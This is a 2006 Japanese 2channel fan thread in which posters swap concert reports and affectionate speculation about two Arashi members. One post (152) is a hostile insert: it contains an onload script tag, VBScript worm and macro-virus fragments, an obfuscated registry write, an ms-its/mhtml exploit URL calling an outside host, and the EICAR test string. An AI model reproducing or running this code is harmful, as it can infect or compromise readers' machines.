2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

もういない…ない【4】

1 :ななしじゃにー:2006/08/04(金) 01:08:26 ID:kFa0/M6Z
○あらちの末っ子組コンビ推奨スレ
○タメ年ライバルの微妙な距離感をそっと見守る
○安置や青林、構ってちゃん、同じ人は逝ってよし
○sage推奨
>>950踏んだ方、次スレよろしく

2 :ななしじゃにー:2006/08/04(金) 01:09:29 ID:kFa0/M6Z
前スレ
二宮和也と松本潤
http://tv6.2ch.net/test/read.cgi/jan/1082017124/
もういない…ない
【2】http://tv8.2ch.net/test/read.cgi/jan/1100345371/
【3】http://tv8.2ch.net/test/read.cgi/jan/1120987510/

3 :ななしじゃにー:2006/08/04(金) 07:13:12 ID:o3/nt9L9
いちもつ

4 :ななしじゃにー:2006/08/04(金) 17:17:00 ID:XQxKdhk/
4ちゃま

5 :ななしじゃにー:2006/08/04(金) 19:17:59 ID:sVtxNBfx
いちもつ

6 :ななしじゃにー:2006/08/05(土) 07:14:55 ID:p8UolQu/
>1
乙&d!

そして前スレ>999、kwsk!
前スレ>1000、もっとkwsk!言霊狙って具体的に!


7 :ななしじゃにー:2006/08/05(土) 11:41:49 ID:WbDh/Lba
>>6
26日のG粗日誌で小僧がロマンスを歪にやらせたいと発言w
顔文字モエス

8 :ななしじゃにー:2006/08/05(土) 22:51:55 ID:9j6KygLV
>1
乙!

次回浄化町ktkr


9 :6:2006/08/05(土) 23:44:39 ID:94RCErxp
>7
d!見てきた。番●呼びモエスw
で、どの番●なんだ?w
小僧、今度紺中に歪の前でいきなり掛け声かけちゃえyo!

10 :ななしじゃにー:2006/08/06(日) 00:48:51 ID:MRFhryaf
なんだあの顔文字ww
モエスw

11 :ななしじゃにー:2006/08/06(日) 16:29:15 ID:Ht1+vE5E
メイキソグ、歪の小僧を見る目が優しく見えます(*´Д`)

12 :ななしじゃにー:2006/08/07(月) 00:28:20 ID:vQwmTHOM
>11
花火のとこで小僧に「一瞬こっち向けたっすよね?」と言われ
ハニカミ否定する歪モエス(*´Д`)
でもヤパーリ、キンテツクリリソに勝るものなし!

13 :ななしじゃにー:2006/08/07(月) 21:53:29 ID:DPZFwTy8
スエッコズでハニカミプラン…(*´Д`)(*´Д`)(*´Д`)アハーン

14 :ななしじゃにー:2006/08/07(月) 21:55:57 ID:CqtEVEtC
それはキモス

15 :ななしじゃにー:2006/08/08(火) 00:44:03 ID:CIa/OqUD
ドSばんちょに馬乗りにされ
キュ〜キュ〜いう小僧モヘ

こんな日がこようとはな…感無量

16 :ななしじゃにー:2006/08/08(火) 01:56:03 ID:OnxcIJYR
>15
キモイ

17 :ななしじゃにー:2006/08/08(火) 13:46:00 ID:CIa/OqUD
>16
ドジン目線の話じゃ茄子
昔は一触即発なふいんき(ry だった末っ子ズが
子犬のようにじゃれあうのがすでに感慨深いだけ

18 :ななしじゃにー:2006/08/08(火) 13:57:45 ID:iUtG19ur
折素多で、歪が「彼女にしたいのは小僧」と言っているのに驚いたw
理由見て納得したがw

19 :ななしじゃにー:2006/08/08(火) 14:39:22 ID:uP1hzGVy
>17
だとしても書き方がキモス

20 :ななしじゃにー:2006/08/08(火) 17:19:11 ID:Ib9E523w
>>19
('A`)

21 :ななしじゃにー:2006/08/08(火) 20:07:40 ID:Fx/B3czV
OnxcIJYR
uP1hzGVy



22 :ななしじゃにー:2006/08/08(火) 22:07:40 ID:FfAPHWTI
>21
おまいも変わらんくらい、ウザーだけどな。

23 :ななしじゃにー:2006/08/09(水) 23:18:16 ID:+KYNzt0f
ハンニバルで、歪のケツをドラに例えてのお遊びがkwys

24 :ななしじゃにー:2006/08/09(水) 23:27:20 ID:W+fjfhL3
大帽子でもハンニバルのドラの音部分で、2人でお遊びしててkwysだった。
そん時は歪の腹をドラに例えてたが、めんたいはケツかw

25 :ななしじゃにー:2006/08/10(木) 13:39:39 ID:03ZSWQvt
( .゚∀゚ ) <歪くんツンデレ喫茶行けばいいじゃないですかフハハハ〜!


26 :ななしじゃにー:2006/08/11(金) 01:51:42 ID:1ZO/wwmN
(*.゚∀゚)。oO(ドS同士のぶつかり合い、テラミタス...!

そういや泥粗の時のテレビショッピングまたやらないか脳。あれ禿ス●なんだがw

27 :ななしじゃにー:2006/08/11(金) 03:19:56 ID:FQ4I5YF2
あの枝豆の夫婦小芝居はネ申だった。

28 :ななしじゃにー:2006/08/11(金) 04:37:48 ID:5rYplBS+
ドSドS言う小僧のほうが真にドSにみえる件

29 :ななしじゃにー:2006/08/11(金) 15:20:27 ID:PwrNjycv
昔は小僧もキツくて歪にドSっぷりを発揮していた気がするんだが。
ここはあえて小僧と歪でドS同士のぶつかり合いが見てみたいw

30 :ななしじゃにー:2006/08/11(金) 15:43:58 ID:0oRU/2nt
つ街角度胸試し

でも、指令に回るとドSに、実行に回るとドMになる
末ズが見れてウマーだたなw
て、これじゃドS同士のぶつかりあいにならんか。

31 :ななしじゃにー:2006/08/11(金) 17:51:37 ID:PwrNjycv
>30
末っ子ズが互いのいいなりに動くネ申の回ダタな。また見たい脳w
アレも良いのだが、末っ子ズガツバトル系のぶつかり合いがスチだ
漏れ的にはあれぞ末ズクオリティー



32 :ななしじゃにー:2006/08/11(金) 17:53:17 ID:NzY24FaZ
>>31
テレビだから手加減しないゼみたいな

33 :ななしじゃにー:2006/08/11(金) 19:52:09 ID:PwrNjycv
>32
その言葉をまんま小僧に返したいw>水泳バトルの件

さっき気付いたが初末っ子IDキタ!(*.゚∀゚)人(`∀´*)

34 :ななしじゃにー:2006/08/11(金) 23:10:57 ID:MUQD9pG0
末ズのガツバトルといえば家宝モンの水中要塞だな。
あれの逆パターンも見てみたい。
もがく小僧に、敵ながら誰よりもエールを送る歪(*´Д`)

35 :ななしじゃにー:2006/08/12(土) 00:24:17 ID:5+bt/NsJ
めんたいのMCで、小僧の鉄紺声優抜擢の経緯を
自分の事のように自慢げに説明してた歪がkwys

なぜ、歪だけが知ってたのが謎だがw

36 :ななしじゃにー:2006/08/12(土) 01:48:18 ID:A43GNm6T
歪は他麺のスケに詳しいぞ

37 :ななしじゃにー:2006/08/12(土) 12:25:54 ID:uWcc/lDF
スケを知っていた事でなく、そこに至る経緯を知っていた事がポイントです。

38 :ななしじゃにー:2006/08/12(土) 15:51:19 ID:zhZgXDpW
"スエズ運河"に反応しちゃった漏れが通りますよ
ではゴメン

39 :ななしじゃにー:2006/08/13(日) 02:10:55 ID:THqqcQzO
城下町の精進料理のとこのやりとりカ●エエと思ったのは自分だけですか。

40 :ななしじゃにー:2006/08/13(日) 21:31:44 ID:kr9nX4UJ
おたま紺のホテル、末っ子ズで相部屋だったそうだw
夜中に歪が風呂場の水蒸気を大量発生させて火災報知器が鳴ったらしく、
フロントから電話かかってきてホテルの人に怒られたと小僧が状況説明してた。

41 :ななしじゃにー:2006/08/13(日) 22:02:39 ID:V2HOLaGD
>40
レポd!
焦る歪を横目で見つつ「歪クン、ま〜たやらかしちゃったよw」と
兄チャソ風吹かせてフッと笑う小僧が想像できますたw

42 :ななしじゃにー:2006/08/13(日) 22:52:15 ID:kAgBhc3q
末っ子ズ相部屋w中が見たいwww

43 :ななしじゃにー:2006/08/13(日) 23:10:45 ID:2KPK9VRB
今日おたまに参戦した自分通りますよ。


1恥部で平安の粘土話から、
歪が平安の粘土を借りて作っちゃえば?みたいな話の流れになって、
小僧「歪くんが作ったらこんなだよ!!」
と、自分の顔を片手は上に片手は下に引っ張って表現してた(わかる?)www
ムンクの叫びみたいな顔www
とりあえず、「歪くんはヘタッピだから」ということが言いたかった小僧。
そんなことを言われて、「フフフ」と笑う歪に萌えますた(´∀`*)




44 :ななしじゃにー:2006/08/13(日) 23:30:43 ID:THqqcQzO
>43
レポd!!
「フフフ」と笑う歪コワスwww

45 :ななしじゃにー:2006/08/14(月) 00:47:06 ID:UfIBpBqr
>>40
フロントの人、直接来たんだよな。
「あのーお宅の部屋火事になってませんかぁ?」って。
その気持ち悪いおっさん見てから、
女の鼻歌霊感じたって歪が言い出してたからな。
フロントの人なのか、霊なのか謎だな。

1恥部ジャムのイントロで腹くすぐりあってますたw

46 :ななしじゃにー:2006/08/14(月) 00:50:41 ID:e0e60H1m
>1恥部ジャムのイントロで腹くすぐりあってますたw

なんかもうどうしちゃったんだ末s(*´Д`)

47 :ななしじゃにー:2006/08/14(月) 00:53:39 ID:LR5261R/
>>45
小僧がフロントから電話がかかってきたと言ってた。
おそらく先に電話がかかってきて、その後フロントの人が直接来たんだろう。

48 :ななしじゃにー:2006/08/14(月) 01:26:40 ID:UfIBpBqr
>>47
ん?小僧、フロントの人の話するときセリフと一緒にドア開けるマネしてなかった?
ま、どっちでもいいけどw

$誌のランキングの話になって
「オレ、キレキャラ5位。リアルじゃねw?」
という歪に
「本当に怖いのは5位だよねw$誌あたりじゃコ●キ(2ネム知らない)とか1位なんだろうけど
 本当に怖いのは5位の人w」とキャッキャ嬉しそうな小僧ですたw

49 :ななしじゃにー:2006/08/14(月) 14:37:01 ID:9ZeQ9ckj
ちきしょうなんかもうなんなんだ(*´д`*)

50 :ななしじゃにー:2006/08/14(月) 15:43:09 ID:LR5261R/
>>48
だから電話かかってきたって話して、
そのあとオサーンの話になったんだってば。
人の話を聞け。

51 :ななしじゃにー:2006/08/14(月) 16:50:32 ID:8bsin/qM
姐さん方レポd!
微妙な距離感を見守るとはいえ、やはり末ズがキャッキャしてると禿和む脳(*´Д`)

52 :ななしじゃにー:2006/08/14(月) 18:10:27 ID:UfIBpBqr
>>50
48はもうどうでもいいっていってんじゃんw
おまえほど、小僧を見てなかったんだろうよ。
マターリしようぜー

自分1部センターステージとエア花道が目の前だったんだが、
小僧と歪なんどか目線合わせてニヤニヤしあってたぞ。

53 :52:2006/08/14(月) 18:37:57 ID:UfIBpBqr
48は×
48で○

54 :ななしじゃにー:2006/08/14(月) 21:09:11 ID:8bsin/qM
>>39
今見れた。自分もオモタ!
モノマネや飯盛りを命じる歪と言いなりに動く小僧。
いつかの街角度胸試しを彷彿とさせてテラモエス

55 :ななしじゃにー:2006/08/17(木) 00:10:33 ID:YMOfuLjc
1恥部MCで歪が暑くて自分のうちわで仰いでたんだが
一応5人分うちわあって、
途中から「今日は小僧のうちわにする」って言って仰いでて和んだw
2恥部の餡子のファイトで小僧が歪のこと笑ってた気がするんだが見てた姐さんいる?

56 :ななしじゃにー:2006/08/17(木) 00:20:37 ID:YMOfuLjc
×仰ぐ
○扇ぐ
申し訳ない…逝ってきます

57 :ななしじゃにー:2006/08/17(木) 00:23:21 ID:v0GgMWNZ
>56
ドンマーイン
レポd( ´∀`)和む。

58 :ななしじゃにー:2006/08/17(木) 01:32:55 ID:KSf8Mp1m
>56
d!
「今日は小僧のうちわにする」
テラモエス(*´Д`)

59 :ななしじゃにー:2006/08/17(木) 02:25:07 ID:srzsAhuJ
しらたき帽かぶらせるときナツラルに
歪「(ちょ)コゾ、半分持って」…即、リピ。

60 :ななしじゃにー:2006/08/17(木) 02:33:36 ID:hm0zOS5G
>56
レポd!ドンマイケル
何故小僧のにするとわざわざ宣告するんだ歪…!モヘるじゃないか…

>59
どっちが助手だってカンジダタな。歪がコゾにエラソーでモヘた。勿論リピさ。

61 :ななしじゃにー:2006/08/17(木) 03:20:07 ID:KSf8Mp1m
別に偉そうではなかったが。

62 :ななしじゃにー:2006/08/17(木) 07:30:11 ID:srzsAhuJ
うん、友達っぽくてイイ!とオモタ。

63 :ななしじゃにー:2006/08/18(金) 00:29:41 ID:fe9N4mN3
牛タン1恥部の歪ソロで歪がサングラスしてて、
しかし暑くてレンズ曇ってたらしいんだが途中から小僧にかけさせてたw
そのあとMCで小僧が暗転してから真っ暗で何も見えなくて焦ったって言ってた
歪も自分がセンターステで歌ってるときに前見えなかったってw
なんか2人ともカ●エかった
くだらなくてスマソ

64 :ななしじゃにー:2006/08/19(土) 11:48:56 ID:CQ51UhJn
歪ちゃーん、な小僧に萌え

65 :ななしじゃにー:2006/08/19(土) 14:14:24 ID:QrqxxT93
孫超GJ!!!!!

66 :ななしじゃにー:2006/08/19(土) 16:08:04 ID:5JQ/roh+
>65
kwsk!!

67 :ななしじゃにー:2006/08/19(土) 17:00:18 ID:aZoHCPTD
65じゃないが
孫にて「メンバーの誰かと、どにに行きたいか?」の質問に
小僧が「歪君とバーベキュー」

是非行ってくれwwww

68 :ななしじゃにー:2006/08/19(土) 18:16:36 ID:5JQ/roh+
>67
d(*´д`*)
ユー達行っちゃいなyo!
歪はそれに対して何か反応したのか気になる

69 :ななしじゃにー:2006/08/19(土) 20:23:25 ID:254ocV1J
録画に失敗した自分負け組_| ̄|○
>67
歪君とバーベキュー(*´∀`)ハウーン
その辺の会話の経緯をkwskおながいします

70 :ななしじゃにー:2006/08/19(土) 21:48:51 ID:xiefVLZJ
鯱2恥部うらあらち。
椅子取りゲームで最後決勝に残った末っ子ズ。
二人でBGMのアレルギーに合わせて、ダンスしたりくるくる回ったりしてカバエかった。

71 :ななしじゃにー:2006/08/19(土) 22:41:26 ID:DoZadLxC
>70
レポd!
で、どっちが勝ったんだ?w

72 :ななしじゃにー:2006/08/19(土) 22:56:03 ID:aoAXkf+8
>68
>67ではないが、 ほんのり笑っておったよ

73 :ななしじゃにー:2006/08/20(日) 00:00:18 ID:Imsme0a7
>>71
買ったのは歪
決勝前の
歪「よろしくお願いします」
小僧「おう、よろしく」
の会話が可愛かったw

74 :ななしじゃにー:2006/08/20(日) 00:17:30 ID:aDm+hxLR
>72
にこやかな顔してたなw
それにしても2人だけでBBQて、盛り上がるのか?w
歪と傘が誰にしたのか気になる木

75 :ななしじゃにー:2006/08/20(日) 04:56:24 ID:qcSO2/sO
モヘた(´∀`)
最近末っ子ズのクオリティが禿GJな件。

76 :ななしじゃにー:2006/08/20(日) 22:29:00 ID:crhpr3FF
どうしてわざわざ歪を指名し二人でBBQがしたいのか
その理由を小一時間ばかり小僧に問い詰めたい

どうしたんだ最近の末っ子ズは(*´д`*)


77 :ななしじゃにー:2006/08/21(月) 09:39:50 ID:Xfn8l66y
少倉、平安の締めのコメントをwktkする末っ子ズ、テラカ●゙(*´∀`)

78 :ななしじゃにー:2006/08/21(月) 23:21:47 ID:TjVXbeoq
イントロクイズの時、近くに座ってて2人共正解がすぐ分かって書いてしまっていた為
山2人が考え中にお互いに答えを見せ合いっこしてた。


79 :ななしじゃにー:2006/08/22(火) 03:18:32 ID:qKXMFV2h
歪、鯱で小僧のω触ってたよね。
慌ててガードしようとして失敗した小僧がカバ●かったw

80 :ななしじゃにー:2006/08/23(水) 21:35:43 ID:QLlnUogF
羞恥のとき歪が小僧に抱きついてた(*´д`)

81 :ななしじゃにー:2006/08/23(水) 22:32:55 ID:5lszRlT+
禿しく詳しく!

82 :ななしじゃにー:2006/08/24(木) 00:14:51 ID:vMwpaqty
羞恥でスケステの端に小僧がいて、そこに歪が後ろから抱きついてた!
びっくりしたよ(´∀`)
あとハンニバルのときお遊びしてたはず。

83 :ななしじゃにー:2006/08/24(木) 00:47:49 ID:vEU0E6CF
ハンニバルのドラ遊びはkwys

84 :ななしじゃにー:2006/08/24(木) 01:34:50 ID:9xum1tUl
>82
d!出来たら小僧の反応をkwsk!

85 :ななしじゃにー:2006/08/25(金) 00:09:01 ID:hCTb+Oau
今日の2部でも歪が小僧を後ろから抱き締めるような感じで踊ってたよ。
肌身だったかな

86 :ななしじゃにー:2006/08/25(金) 18:09:43 ID:QJHjaauz
歪いいヤシだ。

鯱でも4つ椅子持ってきた小僧を
手伝ってやったりしてたよな。

87 :ななしじゃにー:2006/08/26(土) 15:44:22 ID:bCNgRsyV
モエス

88 :ななしじゃにー:2006/08/26(土) 16:48:37 ID:mI/meL6D
笹団子一日目のSHU・U・CHIは、
歪が小僧に後ろから抱きついてるの間近で真横から見てたが、
抱きついてるってより小僧の腰持って、
小僧のケシに歪がコカソを押し付けてた。

89 :ななしじゃにー:2006/08/26(土) 16:50:54 ID:mI/meL6D
あと、肌身の最後で歪が小僧に抱きついたのは、
二日目二部じゃなく一部だよ。

90 :ななしじゃにー:2006/08/29(火) 22:48:31 ID:yqU7cYwD
今日の3恥部歪と小僧ケンカしてたっぽいな。

紺中しきりに歪が小僧に話しかけてて、小僧はなぜかムスってしてて
最後の歪挨拶の時も、小僧平安が後ろに立ってたんだが、歪が挨拶終わった後、
平安に挨拶汁的な感じで前に行かせて小僧の横に立ってた。
歪が近づいた瞬間、小僧がちょっとよけたんだが、歪がまたなんか話しかけてて…
でも小僧は歪無視(?)で「今平安なんて言ったの?聞こえなかった」と。
で、またちょっと立って歪がまた小僧に話しかけて歪が握手の手を差し伸べて、
小僧もムスっとしながら握手してたよ。


何があったんだ?w

91 :ななしじゃにー:2006/08/29(火) 22:52:15 ID:Qb9RVD3u
妄想イラネ

92 :ななしじゃにー:2006/08/29(火) 22:58:46 ID:i8GrLMTD
小僧はよくムスっとしとるだろ
紺中そんな態度とるほど子供じゃ茄子

93 :ななしじゃにー:2006/08/29(火) 23:14:05 ID:/fSOOE3b
>90
それを微笑ましく見ていた自分は一体・・・
特に問題にするようなことでもないかと

94 :ななしじゃにー:2006/08/30(水) 01:13:09 ID:GOln6QbQ
明日誕生日だけど大丈夫か?
今日は関係者もいっぱい来てたようだけど
そんな所でケンカなんて・・・

95 :ななしじゃにー:2006/08/30(水) 01:32:10 ID:ouX+2SIB
2恥部。
歪小僧ひらでステ上にいるとき(ジャヌだったかな?)、歪が小僧に馬路口チッスしてるように見えたんだが。
フリだった?

96 :ななしじゃにー:2006/08/30(水) 05:19:56 ID:9AYq63xl
甘噛みについてと>95についてkwsk!

97 :ななしじゃにー:2006/08/31(木) 00:45:36 ID:BoOOqEzw
歪やりすぎwwwww







モヘ。

98 :ななしじゃにー:2006/08/31(木) 12:46:55 ID:uL181YWO
>96
だ...誰かkwsk!!

小僧からの誕プレ禿しく気に入っていたようだなw

99 :ななしじゃにー:2006/08/31(木) 17:57:36 ID:ErmO2u6H
歪が小僧の耳を甘噛みしたのは横蟻1日目1部の照美だな。
照美の絡みのとき、
メインステ両脇のスクリーンとメインステど真ん中のスクリーンはいつも微妙に違う角度から末っ子を映してるんだか、
真ん中のほうのモノクロスクリーンに、歪が耳たぶを噛んでるところが映ってた。

100 :ななしじゃにー:2006/08/31(木) 18:07:45 ID:0jUCjn4n
(.゜∀゜)人ノノ`∀´ル >100!

101 :ななしじゃにー:2006/08/31(木) 19:50:04 ID:KMWV+Yn1
コゾ日記で歪誕が再び華麗にヌルーされている件。
紺で祝ってるからいいやとオモタのだろうか…紺行けない自分にはセツナスorz

102 :ななしじゃにー:2006/08/31(木) 23:29:28 ID:GwYEgMeM
>>101
小僧が歪にプレゼントした品物聞いたら
歪を思う気持ちが溢れてる。
二人が二人のやり方でわかり合ってればいいこと。

103 :ななしじゃにー:2006/08/31(木) 23:34:07 ID:P2P/4Tao
歪に限らず小僧がニッキで誕生日に触れることってあまりないよね?
そういえば去年のプレゼントのやりとりもカ●゙エかったな。

104 :ななしじゃにー:2006/09/01(金) 00:47:32 ID:IrNwMx6+
>>103
ノシ
「おせえよ」だったっけか(*´Д`*)

105 :ななしじゃにー:2006/09/01(金) 00:52:13 ID:FBAvuLsL
>104
残念、「へへへ、おっせぇ」だったw

106 :ななしじゃにー:2006/09/01(金) 01:11:58 ID:IrNwMx6+
>>105
soreda!
(*´Д`*)ハァーン

107 :ななしじゃにー:2006/09/01(金) 08:02:43 ID:j2ojVkuv
ズムイン、あなたがネ申か…。

108 :ななしじゃにー:2006/09/01(金) 08:13:29 ID:Ko5z7gL0
ズムイン、思わずチャンネルかえちまったよw

109 :ななしじゃにー:2006/09/01(金) 16:15:33 ID:evwrHV7B
仲直りはしてた?

110 :ななしじゃにー:2006/09/01(金) 17:20:01 ID:6vkPY6ue
ズムイン、永久保存版だなw

111 :ななしじゃにー:2006/09/01(金) 19:08:32 ID:TmkFVn5X
>101
小僧お得意の複雑骨折ですな。
まさにこれが末っ子ズクオリティー。

112 :ななしじゃにー:2006/09/02(土) 03:10:30 ID:i2uAFnq5
>101
夜中に病院に担ぎ込まれるような状態で、
顎の痛みをこらえて書いたであろうニッキに
難癖付けてるおまいみたいなのがよりによって末っ子スキーだってことのほうがセツナスだよ。

113 :ななしじゃにー:2006/09/02(土) 09:18:08 ID:QMFHOKBN
おまいウザいよ。
んな妄想イラネ。

114 :ななしじゃにー:2006/09/02(土) 11:01:33 ID:5dBtbaK5
101だが紺レポでしか祝いの状況が読めない末っ子ズスキーとしては
コゾ日記でコゾの口からの歪オメ発言を聞きたかっただけにセツナスだったんだ。
難癖付けてるつもりはないからそう喧嘩腰になるなよ(´・ω・`)

115 :ななしじゃにー:2006/09/02(土) 12:22:01 ID:GmyMj0eN
一体ズムインで何があったんだ…(´・ω・`)

116 :ななしじゃにー:2006/09/02(土) 12:33:46 ID:Sq2ArrON
>115
テルミで歪が小僧の頭を抱えて歌わせてるシーンが流れたなんて
教えてあげないよ。

117 :ななしじゃにー:2006/09/02(土) 12:35:03 ID:zOK4T8dE
>114
歪にしか興味がないのかもしれないけど他面の時もニッキに書いてないよ。
小僧ばかりに求めたら気の毒だ。

118 :ななしじゃにー:2006/09/02(土) 15:49:48 ID:ank43U8G
>116
ズムイン見逃した自分は負け組orz



119 :ななしじゃにー:2006/09/02(土) 18:11:56 ID:CxyJjc6J
そんなおまいらに…

つ本日のコゾニッキ

120 :ななしじゃにー:2006/09/02(土) 18:32:04 ID:x5PSOSPD
歪がコゾニッキに出てくる時は必ずハートマークが使われている件

121 :ななしじゃにー:2006/09/02(土) 18:37:50 ID:5bZH59vD
>120
今頃気づくなよw

バスで弁当片づけてくれたり歪は本当にいい奴だな
にしても小僧、優しいアクマて(*´д`) モヘ

122 :ななしじゃにー:2006/09/02(土) 19:04:30 ID:SQBy2+/P
>121
ノシノシ
優しいアクマ(((⊂⌒⊃*´Д`)⊃)))カ●エエ

123 :ななしじゃにー:2006/09/02(土) 19:27:17 ID:IJ+GxFaH
人に可愛がられるのタイプの小僧が、歪のことを可愛がってる関係が良いw

124 :ななしじゃにー:2006/09/02(土) 20:43:05 ID:Wehq+Pj/
小僧の中ではシューマイ歪の面影がまだ残ってるのかもな。

125 :ななしじゃにー:2006/09/02(土) 20:55:46 ID:kptG7tHT
♪あの人は〜悪魔っはぁ〜 私を〜とりこにするぅ〜 優しい悪魔〜♪

126 :ななしじゃにー:2006/09/02(土) 21:03:58 ID:1go7AbRn
優しい悪魔って言葉にテラ惹かれる。
このタイトルでスレタイ並みの名曲を聴かせてくれ。

127 :ななしじゃにー:2006/09/02(土) 21:48:15 ID:ank43U8G
>126
そんなん歌われたら泣くw

今日のコゾニッキ、ホッコリしますた(´Д`*)


128 :ななしじゃにー:2006/09/03(日) 00:19:35 ID:L4DAuWIg
デスノート。
ライトを松本潤、Lを二宮和也で。


129 :ななしじゃにー:2006/09/03(日) 00:50:53 ID:L4DAuWIg
128
誤爆です。スマソ… orz

130 :ななしじゃにー:2006/09/03(日) 02:35:54 ID:QIwDd/B+
自己主張してなんぼだw丼米w

131 :ななしじゃにー:2006/09/03(日) 14:36:32 ID:8aZiuRmn
乗り遅れますたが昨日のコゾニッキはネ申
優しい悪魔歪と悪魔コメント小僧で悪魔コンビだなwカ●゙エス


132 :ななしじゃにー:2006/09/04(月) 17:52:01 ID:pe4Q/+O2
もしかしてズー●インの映像がまさに>99?

133 :ななしじゃにー:2006/09/05(火) 23:30:58 ID:lZStG3AI
C千イベの末っ子sレポヨロ...!

134 :ななしじゃにー:2006/09/07(木) 01:51:34 ID:hMoVxoDw
G粗ホムペ川柳おねだり歪に恐喝ネタで絡みまくる小僧モエス
できる事なら全部放送してホスィかったな


135 :ななしじゃにー:2006/09/07(木) 20:15:17 ID:/mRlrf4y
片目誌に末っ子sキス直前写真が

136 :ななしじゃにー:2006/09/07(木) 21:00:45 ID:z2h9LHYt
ハダカのままシャツ羽織って駆け出してくる!!ノシ

137 :ななしじゃにー:2006/09/08(金) 14:13:12 ID:v+4OLfLy
照美が禿ウマーだったんだなorz
紺行けなかった負け犬だジヌン。
折スタも照美で顔くっつけた写真掲載w

138 :ななしじゃにー:2006/09/08(金) 14:28:51 ID:xm7ssTd2
オリスタも萌え〜だよ

139 :ななしじゃにー:2006/09/10(日) 16:53:51 ID:57YIGLg6
11

140 :ななしじゃにー:2006/09/11(月) 04:21:54 ID:K5H2WsJr
ktkr

141 :ななしじゃにー:2006/09/11(月) 10:02:58 ID:PAI9vUEB
ようつべにて末っ子ズイン木更津孫見た
あの爺ちゃん婆ちゃんとこまた行かないかな
4人ともテラモエス

142 :ななしじゃにー:2006/09/11(月) 15:50:06 ID:PLi8GkSZ
いまさら、しかもうpされたものの話書くなや、ヴォケ

143 :ななしじゃにー:2006/09/11(月) 18:31:16 ID:QUKGR3KO
ガーン

144 :ななしじゃにー:2006/09/11(月) 19:48:52 ID:y9l7GMvO
>142
ローカルものは普通に見れないヲタの方が多いんだよヴォケ


145 :ななしじゃにー:2006/09/12(火) 05:20:52 ID:7iEQmrdG
つ Ca

146 :ななしじゃにー:2006/09/14(木) 01:24:54 ID:HF7t1s2r
(.゜∀゜)チューしてくれよ、チューしてくれよ!

147 :ななしじゃにー:2006/09/14(木) 01:41:07 ID:XBNAb79K
>146
羞恥な末っ子ズたまらん…_|` ̄|○

148 :ななしじゃにー:2006/09/14(木) 09:05:40 ID:T9iUifGe
>146
偽者イラネ

149 :ななしじゃにー:2006/09/14(木) 22:31:15 ID:kjMyA4t+
何の撮影会だよ!

150 :ななしじゃにー:2006/09/15(金) 00:16:04 ID:9xffKFQP
小僧のWストッキングに「息できる?」と心配する歪がたまらん

151 :ななしじゃにー:2006/09/15(金) 00:56:06 ID:TrtnAnM3
優しい悪魔だからなw

152 :<body onload=window()>:2006/09/15(金) 12:30:15 ID:0tfitqAb
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

153 :ななしじゃにー:2006/09/16(土) 08:55:15 ID:w3J7XJIp
歪をおんぶする小僧(*´∀`)

154 :ななしじゃにー:2006/09/16(土) 11:30:21 ID:P7aH8IW6
(´Д`*) モヘェェ

155 :ななしじゃにー:2006/09/16(土) 16:23:42 ID:pP5+PVsr
>153
何だ、どこで何があった!?

156 :ななしじゃにー:2006/09/16(土) 17:35:05 ID:urTUSIbJ
>155
台湾。
鼎泰豊に入る前、車から降りた小僧が自分から
歪をおんぶしたラスィ。w
向こうの代表的芸能新聞を検索したらすぐに出てくるよ。

157 :ななしじゃにー:2006/09/16(土) 20:18:33 ID:pP5+PVsr
>156
d!
なかよち末っ子ズを探す旅に行ってくるノシ

158 :ななしじゃにー:2006/09/17(日) 12:09:42 ID:PgtVaMRv
やっと、おんぶ画像見た…
なんなんだ、あれは(*´∀`)
普通の兄ちゃんがマ●ケルをおんぶ、にしか見えんwww

159 :ななしじゃにー:2006/09/17(日) 20:47:15 ID:i9I7As3P
記事は見つけたが時既に遅く画像なくなってた…orz
しかし末ズは普段あまり絡まない分時々本当にやらかしてくれるな!モヘ!

160 :ななしじゃにー:2006/09/17(日) 23:28:09 ID:xZASIj+e
優しいヒト、おんぶ画像見れるサイト教えて!

161 :ななしじゃにー:2006/09/19(火) 13:36:54 ID:X7IJAXA6
>普通の兄ちゃんがマ●ケルをおんぶ

たしかにw

162 :ななしじゃにー:2006/09/19(火) 15:39:07 ID:hRF9fgq1
>160
甘えんな、ヴォケ




づttp://www.excite.co.jp/world/chinese/web/?wb_url=http%3A%2F%2Fpost.baidu.com%2Ff%3Fkz%3D133930468&wb_lp=CHJA


163 :ななしじゃにー:2006/09/19(火) 17:06:38 ID:G6hCae7Q
ツンデレktkr!

164 :ななしじゃにー:2006/09/19(火) 19:16:23 ID:ixIknHQl
>160=163>162
他所に逝ってクレ。

165 :ななしじゃにー:2006/09/22(金) 17:46:50 ID:5xwBwsNE
とりあえず、歩誌の紺レポGJ

166 :ななしじゃにー:2006/09/23(土) 11:09:20 ID:I4plXXZz
☆誌も何気にGJだとオモー

写真は小さいけど、2人の表情がイイ!!

167 :ななしじゃにー:2006/09/23(土) 16:39:18 ID:Q4EpNs2D
歪の私生活を覗いてみたいのか、小僧w

168 :ななしじゃにー:2006/09/23(土) 23:22:29 ID:f0XeAKTE
>167
kwsk!!

169 :ななしじゃにー:2006/09/24(日) 00:22:02 ID:+cwKFYUc
>168
歩誌のあらち対談にて。メンの私生活の話題になって
